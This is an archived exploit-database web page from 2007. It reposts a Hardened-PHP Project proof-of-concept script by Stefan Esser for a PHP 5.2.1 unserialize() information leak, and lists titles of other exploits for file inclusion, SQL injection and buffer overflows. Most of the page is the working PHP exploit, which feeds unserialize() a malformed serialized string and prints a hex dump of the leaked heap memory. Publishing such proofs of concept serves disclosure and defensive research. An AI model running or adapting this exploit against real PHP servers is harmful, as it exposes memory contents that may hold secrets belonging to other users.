exploits , vulnerabilities , articles , PHP 5.2.1 unserialize() Local Information Leak Exploit

2007-06-15 XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-08 NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit
2007-06-07 Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln
2007-06-06 Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
2007-05-24 cpCommerce <= 1.1.0 (category.php id_category) SQL Injection Exploit
2007-05-24 Dokeos <= 1.6.5 (courseLog.php scormcontopen) SQL Injection Exploit

2007-03-24

PHP 5.2.1 unserialize() Local Information Leak Exploit

Rated as : Critical

<?php
 
////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___ 
//
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
//
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
//
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
//
  //                                                                   
//
  //         Proof of concept code from the Hardened-PHP Project       
//
  //                   (C) Copyright 2007 Stefan Esser                 
//
  //                                                                   
//
 
////////////////////////////////////////////////////////////////////////
  //       PHP 5.2.1 unserialize() Information Leak Vulnerability      
//
 
////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");
  
  
  
  
  $str = 'S:'.(100*3).':"'.str_repeat('\61', 100).'"';
  $arr = array(str_repeat('"',
200)."1"=>1,str_repeat('"', 200)."2"=>1);

  $heapdump = unserialize($str);
  
  
  
  
  echo "Heapdump\n---------\n\n";
  
  $len = strlen($heapdump);
  for ($b=0; $b<$len; $b+=16) {
    printf("%08x: ", $b);
    for ($i=0; $i<16; $i++) {
      if ($b+$i<$len) {
          printf ("%02x ", ord($heapdump[$b+$i]));
      } else {
          printf (".. ");
      }
    }
    for ($i=0; $i<16; $i++) {
      if ($b+$i<$len) {
          $c = ord($heapdump[$b+$i]);
      } else {
          $c = 0;
      }
      if ($c > 127 || $c < 32) {
        $c = ord(".");
      }
      printf ("%c", $c);
    }
    printf("\n");
  }
?>
securitydot.net - 2007-03-24

Exploits - newest 10 RSS | More

2007-06-15 57222 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34160 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42365 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29307 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19748 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16686 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19382 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33583 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17210 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit